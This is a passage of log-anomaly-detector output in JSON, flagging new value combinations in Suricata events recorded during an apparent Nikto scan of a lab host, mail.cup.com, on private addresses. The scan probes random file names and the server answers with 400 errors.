"CLOSED", "/parser/model/event_type/fileinfo/fileinfo/stored_str": "\",\"stored\":", "/parser/model/event_type/fileinfo/fileinfo/stored": 1, "/parser/model/event_type/fileinfo/fileinfo/size_str": ",\"size\":", "/parser/model/event_type/fileinfo/fileinfo/size": 226, "/parser/model/event_type/fileinfo/fileinfo/tx_id_str": ",\"tx_id\":", "/parser/model/event_type/fileinfo/fileinfo/tx_id": 0, "/parser/model/event_type/fileinfo/fileinfo/brack_str": "}}", "/parser/model/event_type/fileinfo/fileinfo/filename/filename": "\"filename\":\"\\/bISn4adA.showsource\",", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename_str": "\"filename\":\"", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename": "\\/bISn4adA.showsource", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/quote_str": "\",", "/parser/model/event_type/fileinfo/http/hostname_str": ",\"http\":{\"hostname\":\"", "/parser/model/event_type/fileinfo/http/hostname": "mail.cup.com", "/parser/model/event_type/fileinfo/http/url_str": "\",\"url\":\"", "/parser/model/event_type/fileinfo/http/url": "\\/bISn4adA.showsource", "/parser/model/event_type/fileinfo/http/http_user_agent_str": "\",\"http_user_agent\":\"", "/parser/model/event_type/fileinfo/http/http_user_agent": "Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)", "/parser/model/event_type/fileinfo/http/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/http_refer": null, "/parser/model/event_type/fileinfo/http/http_method_str": "\",\"http_method\":\"", "/parser/model/event_type/fileinfo/http/http_method": "GET", "/parser/model/event_type/fileinfo/http/protocol_str": "\",\"protocol\":\"", "/parser/model/event_type/fileinfo/http/protocol": "HTTP\\/1.1", "/parser/model/event_type/fileinfo/http/quote_str": "\"", "/parser/model/event_type/fileinfo/http/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/redirect": null, 
"/parser/model/event_type/fileinfo/http/length_str": ",\"length\":", "/parser/model/event_type/fileinfo/http/length": 226, "/parser/model/event_type/fileinfo/http/brack_str": "}", "/parser/model/event_type/fileinfo/http/status/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/status/status/status_str": ",\"status\":", "/parser/model/event_type/fileinfo/http/status/status/status": 400, "/parser/model/event_type/fileinfo/http/content_type/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type_str": "\",\"http_content_type\":\"", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type": "text\\/html", "/parser/model/event_type/fileinfo/conn/src_ip_str": "\"src_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4": "192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46798,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_ip": 3232238234, "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port_str": "\",\"src_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port": 80, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip_str": ",\"dest_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip": 3232238318, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port_str": "\",\"dest_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port": 46798, "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto_str": ",\"proto\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto": "TCP", "/parser/model/event_type/fileinfo/conn/ip/ipv4/quote": "\"", "/parser/model/in_iface/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/in_iface/in_iface/in_iface_str": "\"in_iface\":\"", "/parser/model/in_iface/in_iface/in_iface": "eth0", "/parser/model/in_iface/in_iface/comma_str": "\",", "/parser/model/flow_id/flow_id": "\"flow_id\":2212887393913480,", 
"/parser/model/flow_id/flow_id/flow_id_str": "\"flow_id\":", "/parser/model/flow_id/flow_id/flow_id": 2212887393913480, "/parser/model/flow_id/flow_id/comma_str": "," } }, "LogData": { "RawLogData": [ "{\"timestamp\":\"2020-03-04T19:18:34.184027+0000\",\"flow_id\":2212887393913480,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46798,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.showsource\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.showsource\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}" ], "Timestamps": [ 1583349514.18 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 9, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata err message", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_err", "AffectedLogAtomPaths": [ "/parser/model/message", "/parser/model/classification", "/parser/model/priority" ], "AffectedLogAtomValues": [ "SURICATA HTTP METHOD terminated by non-compliant character", "Generic Protocol Command Decode", 3 ], "ParsedLogAtom": { "/parser/model": "03/04/2020-19:18:34.186320 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46800 -> 192.168.10.154:80", "/parser/model/time": 1583349514.18632, "/parser/model/brack_str1": "] {", "/parser/model/id1": 1, "/parser/model/sep1": ":", "/parser/model/id2": 2221030, "/parser/model/sep2": ":", "/parser/model/id3": 1, "/parser/model/sep3": "] ", "/parser/model/message": "SURICATA HTTP METHOD terminated by non-compliant 
character", "/parser/model/classficiation_str": " [**] [Classification: ", "/parser/model/classification": "Generic Protocol Command Decode", "/parser/model/priority_str": "] [Priority: ", "/parser/model/priority": 3, "/parser/model/conn": "TCP", "/parser/model/brack_str2": "} ", "/parser/model/src_ip": 3232238318, "/parser/model/colon": ":", "/parser/model/src_port": 46800, "/parser/model/arrow_str": " -> ", "/parser/model/dst_ip": 3232238234, "/parser/model/dst_port": 80 } }, "LogData": { "RawLogData": [ "03/04/2020-19:18:34.186320 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46800 -> 192.168.10.154:80" ], "Timestamps": [ 1583349514.19 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 11, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata fileinfo", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_fileinfo", "AffectedLogAtomPaths": [ "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename", "/parser/model/event_type/fileinfo/fileinfo/state", "/parser/model/event_type/fileinfo/fileinfo/stored" ], "AffectedLogAtomValues": [ "\\/bISn4adA.cfg", "CLOSED", 1 ], "ParsedLogAtom": { "/parser/model": "{\"timestamp\":\"2020-03-04T19:18:34.186581+0000\",\"flow_id\":1239879732876050,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46800,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.cfg\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) 
(Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.cfg\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/time_str": "{\"timestamp\":\"", "/parser/model/time": 1583349514.186581, "/parser/model/plus_sign": "+", "/parser/model/tz": 0, "/parser/model/comma_str": "\",", "/parser/model/flow_id": "\"flow_id\":1239879732876050,", "/parser/model/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/event_type_str": "\"event_type\":\"", "/parser/model/event_type/fileinfo": "fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46800,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.cfg\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.cfg\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo_str": "fileinfo\",", "/parser/model/event_type/fileinfo/conn": "\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46800,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/http": ",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.cfg\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226}", "/parser/model/event_type/fileinfo/app_proto_str": ",\"app_proto\":\"", "/parser/model/event_type/fileinfo/app_proto": "http", "/parser/model/event_type/fileinfo/fileinfo": 
"\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.cfg\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo/fileinfo_str": "\",\"fileinfo\":{", "/parser/model/event_type/fileinfo/fileinfo/filename": "\"filename\":\"\\/bISn4adA.cfg\",", "/parser/model/event_type/fileinfo/fileinfo/state_str": "\"state\":\"", "/parser/model/event_type/fileinfo/fileinfo/state": "CLOSED", "/parser/model/event_type/fileinfo/fileinfo/stored_str": "\",\"stored\":", "/parser/model/event_type/fileinfo/fileinfo/stored": 1, "/parser/model/event_type/fileinfo/fileinfo/size_str": ",\"size\":", "/parser/model/event_type/fileinfo/fileinfo/size": 226, "/parser/model/event_type/fileinfo/fileinfo/tx_id_str": ",\"tx_id\":", "/parser/model/event_type/fileinfo/fileinfo/tx_id": 0, "/parser/model/event_type/fileinfo/fileinfo/brack_str": "}}", "/parser/model/event_type/fileinfo/fileinfo/filename/filename": "\"filename\":\"\\/bISn4adA.cfg\",", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename_str": "\"filename\":\"", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename": "\\/bISn4adA.cfg", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/quote_str": "\",", "/parser/model/event_type/fileinfo/http/hostname_str": ",\"http\":{\"hostname\":\"", "/parser/model/event_type/fileinfo/http/hostname": "mail.cup.com", "/parser/model/event_type/fileinfo/http/url_str": "\",\"url\":\"", "/parser/model/event_type/fileinfo/http/url": "\\/bISn4adA.cfg", "/parser/model/event_type/fileinfo/http/http_user_agent_str": "\",\"http_user_agent\":\"", "/parser/model/event_type/fileinfo/http/http_user_agent": "Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)", "/parser/model/event_type/fileinfo/http/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/http_refer": null, "/parser/model/event_type/fileinfo/http/http_method_str": "\",\"http_method\":\"", 
"/parser/model/event_type/fileinfo/http/http_method": "GET", "/parser/model/event_type/fileinfo/http/protocol_str": "\",\"protocol\":\"", "/parser/model/event_type/fileinfo/http/protocol": "HTTP\\/1.1", "/parser/model/event_type/fileinfo/http/quote_str": "\"", "/parser/model/event_type/fileinfo/http/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/redirect": null, "/parser/model/event_type/fileinfo/http/length_str": ",\"length\":", "/parser/model/event_type/fileinfo/http/length": 226, "/parser/model/event_type/fileinfo/http/brack_str": "}", "/parser/model/event_type/fileinfo/http/status/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/status/status/status_str": ",\"status\":", "/parser/model/event_type/fileinfo/http/status/status/status": 400, "/parser/model/event_type/fileinfo/http/content_type/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type_str": "\",\"http_content_type\":\"", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type": "text\\/html", "/parser/model/event_type/fileinfo/conn/src_ip_str": "\"src_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4": "192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46800,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_ip": 3232238234, "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port_str": "\",\"src_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port": 80, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip_str": ",\"dest_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip": 3232238318, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port_str": "\",\"dest_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port": 46800, "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto_str": ",\"proto\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto": 
"TCP", "/parser/model/event_type/fileinfo/conn/ip/ipv4/quote": "\"", "/parser/model/in_iface/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/in_iface/in_iface/in_iface_str": "\"in_iface\":\"", "/parser/model/in_iface/in_iface/in_iface": "eth0", "/parser/model/in_iface/in_iface/comma_str": "\",", "/parser/model/flow_id/flow_id": "\"flow_id\":1239879732876050,", "/parser/model/flow_id/flow_id/flow_id_str": "\"flow_id\":", "/parser/model/flow_id/flow_id/flow_id": 1239879732876050, "/parser/model/flow_id/flow_id/comma_str": "," } }, "LogData": { "RawLogData": [ "{\"timestamp\":\"2020-03-04T19:18:34.186581+0000\",\"flow_id\":1239879732876050,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46800,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.cfg\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.cfg\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}" ], "Timestamps": [ 1583349514.19 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 9, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata err message", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_err", "AffectedLogAtomPaths": [ "/parser/model/message", "/parser/model/classification", "/parser/model/priority" ], "AffectedLogAtomValues": [ "SURICATA HTTP METHOD terminated by non-compliant character", "Generic Protocol Command Decode", 3 ], "ParsedLogAtom": { "/parser/model": "03/04/2020-19:18:34.188797 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 
192.168.10.238:46802 -> 192.168.10.154:80", "/parser/model/time": 1583349514.188797, "/parser/model/brack_str1": "] {", "/parser/model/id1": 1, "/parser/model/sep1": ":", "/parser/model/id2": 2221030, "/parser/model/sep2": ":", "/parser/model/id3": 1, "/parser/model/sep3": "] ", "/parser/model/message": "SURICATA HTTP METHOD terminated by non-compliant character", "/parser/model/classficiation_str": " [**] [Classification: ", "/parser/model/classification": "Generic Protocol Command Decode", "/parser/model/priority_str": "] [Priority: ", "/parser/model/priority": 3, "/parser/model/conn": "TCP", "/parser/model/brack_str2": "} ", "/parser/model/src_ip": 3232238318, "/parser/model/colon": ":", "/parser/model/src_port": 46802, "/parser/model/arrow_str": " -> ", "/parser/model/dst_ip": 3232238234, "/parser/model/dst_port": 80 } }, "LogData": { "RawLogData": [ "03/04/2020-19:18:34.188797 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46802 -> 192.168.10.154:80" ], "Timestamps": [ 1583349514.19 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 11, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata fileinfo", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_fileinfo", "AffectedLogAtomPaths": [ "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename", "/parser/model/event_type/fileinfo/fileinfo/state", "/parser/model/event_type/fileinfo/fileinfo/stored" ], "AffectedLogAtomValues": [ "\\/bISn4adA.iso8859-2", "CLOSED", 1 ], "ParsedLogAtom": { "/parser/model": 
"{\"timestamp\":\"2020-03-04T19:18:34.189008+0000\",\"flow_id\":964576624172563,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46802,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.iso8859-2\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.iso8859-2\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/time_str": "{\"timestamp\":\"", "/parser/model/time": 1583349514.189008, "/parser/model/plus_sign": "+", "/parser/model/tz": 0, "/parser/model/comma_str": "\",", "/parser/model/flow_id": "\"flow_id\":964576624172563,", "/parser/model/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/event_type_str": "\"event_type\":\"", "/parser/model/event_type/fileinfo": "fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46802,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.iso8859-2\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.iso8859-2\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo_str": "fileinfo\",", "/parser/model/event_type/fileinfo/conn": "\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46802,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/http": ",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.iso8859-2\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) 
(Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226}", "/parser/model/event_type/fileinfo/app_proto_str": ",\"app_proto\":\"", "/parser/model/event_type/fileinfo/app_proto": "http", "/parser/model/event_type/fileinfo/fileinfo": "\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.iso8859-2\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo/fileinfo_str": "\",\"fileinfo\":{", "/parser/model/event_type/fileinfo/fileinfo/filename": "\"filename\":\"\\/bISn4adA.iso8859-2\",", "/parser/model/event_type/fileinfo/fileinfo/state_str": "\"state\":\"", "/parser/model/event_type/fileinfo/fileinfo/state": "CLOSED", "/parser/model/event_type/fileinfo/fileinfo/stored_str": "\",\"stored\":", "/parser/model/event_type/fileinfo/fileinfo/stored": 1, "/parser/model/event_type/fileinfo/fileinfo/size_str": ",\"size\":", "/parser/model/event_type/fileinfo/fileinfo/size": 226, "/parser/model/event_type/fileinfo/fileinfo/tx_id_str": ",\"tx_id\":", "/parser/model/event_type/fileinfo/fileinfo/tx_id": 0, "/parser/model/event_type/fileinfo/fileinfo/brack_str": "}}", "/parser/model/event_type/fileinfo/fileinfo/filename/filename": "\"filename\":\"\\/bISn4adA.iso8859-2\",", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename_str": "\"filename\":\"", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename": "\\/bISn4adA.iso8859-2", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/quote_str": "\",", "/parser/model/event_type/fileinfo/http/hostname_str": ",\"http\":{\"hostname\":\"", "/parser/model/event_type/fileinfo/http/hostname": "mail.cup.com", "/parser/model/event_type/fileinfo/http/url_str": "\",\"url\":\"", "/parser/model/event_type/fileinfo/http/url": "\\/bISn4adA.iso8859-2", "/parser/model/event_type/fileinfo/http/http_user_agent_str": "\",\"http_user_agent\":\"", 
"/parser/model/event_type/fileinfo/http/http_user_agent": "Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)", "/parser/model/event_type/fileinfo/http/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/http_refer": null, "/parser/model/event_type/fileinfo/http/http_method_str": "\",\"http_method\":\"", "/parser/model/event_type/fileinfo/http/http_method": "GET", "/parser/model/event_type/fileinfo/http/protocol_str": "\",\"protocol\":\"", "/parser/model/event_type/fileinfo/http/protocol": "HTTP\\/1.1", "/parser/model/event_type/fileinfo/http/quote_str": "\"", "/parser/model/event_type/fileinfo/http/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/redirect": null, "/parser/model/event_type/fileinfo/http/length_str": ",\"length\":", "/parser/model/event_type/fileinfo/http/length": 226, "/parser/model/event_type/fileinfo/http/brack_str": "}", "/parser/model/event_type/fileinfo/http/status/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/status/status/status_str": ",\"status\":", "/parser/model/event_type/fileinfo/http/status/status/status": 400, "/parser/model/event_type/fileinfo/http/content_type/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type_str": "\",\"http_content_type\":\"", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type": "text\\/html", "/parser/model/event_type/fileinfo/conn/src_ip_str": "\"src_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4": "192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46802,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_ip": 3232238234, "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port_str": "\",\"src_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port": 80, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip_str": 
",\"dest_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip": 3232238318, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port_str": "\",\"dest_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port": 46802, "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto_str": ",\"proto\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto": "TCP", "/parser/model/event_type/fileinfo/conn/ip/ipv4/quote": "\"", "/parser/model/in_iface/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/in_iface/in_iface/in_iface_str": "\"in_iface\":\"", "/parser/model/in_iface/in_iface/in_iface": "eth0", "/parser/model/in_iface/in_iface/comma_str": "\",", "/parser/model/flow_id/flow_id": "\"flow_id\":964576624172563,", "/parser/model/flow_id/flow_id/flow_id_str": "\"flow_id\":", "/parser/model/flow_id/flow_id/flow_id": 964576624172563, "/parser/model/flow_id/flow_id/comma_str": "," } }, "LogData": { "RawLogData": [ "{\"timestamp\":\"2020-03-04T19:18:34.189008+0000\",\"flow_id\":964576624172563,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46802,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.iso8859-2\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.iso8859-2\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}" ], "Timestamps": [ 1583349514.19 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 9, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata err message", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_err", "AffectedLogAtomPaths": [ "/parser/model/message", 
"/parser/model/classification", "/parser/model/priority" ], "AffectedLogAtomValues": [ "SURICATA HTTP METHOD terminated by non-compliant character", "Generic Protocol Command Decode", 3 ], "ParsedLogAtom": { "/parser/model": "03/04/2020-19:18:34.192062 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46804 -> 192.168.10.154:80", "/parser/model/time": 1583349514.192062, "/parser/model/brack_str1": "] {", "/parser/model/id1": 1, "/parser/model/sep1": ":", "/parser/model/id2": 2221030, "/parser/model/sep2": ":", "/parser/model/id3": 1, "/parser/model/sep3": "] ", "/parser/model/message": "SURICATA HTTP METHOD terminated by non-compliant character", "/parser/model/classficiation_str": " [**] [Classification: ", "/parser/model/classification": "Generic Protocol Command Decode", "/parser/model/priority_str": "] [Priority: ", "/parser/model/priority": 3, "/parser/model/conn": "TCP", "/parser/model/brack_str2": "} ", "/parser/model/src_ip": 3232238318, "/parser/model/colon": ":", "/parser/model/src_port": 46804, "/parser/model/arrow_str": " -> ", "/parser/model/dst_ip": 3232238234, "/parser/model/dst_port": 80 } }, "LogData": { "RawLogData": [ "03/04/2020-19:18:34.192062 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46804 -> 192.168.10.154:80" ], "Timestamps": [ 1583349514.19 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 11, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata fileinfo", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_fileinfo", "AffectedLogAtomPaths": [ "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename", "/parser/model/event_type/fileinfo/fileinfo/state", 
"/parser/model/event_type/fileinfo/fileinfo/stored" ], "AffectedLogAtomValues": [ "\\/bISn4adA.php3+", "CLOSED", 1 ], "ParsedLogAtom": { "/parser/model": "{\"timestamp\":\"2020-03-04T19:18:34.192275+0000\",\"flow_id\":1233325612787490,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46804,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.php3+\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.php3+\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/time_str": "{\"timestamp\":\"", "/parser/model/time": 1583349514.192275, "/parser/model/plus_sign": "+", "/parser/model/tz": 0, "/parser/model/comma_str": "\",", "/parser/model/flow_id": "\"flow_id\":1233325612787490,", "/parser/model/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/event_type_str": "\"event_type\":\"", "/parser/model/event_type/fileinfo": "fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46804,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.php3+\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) 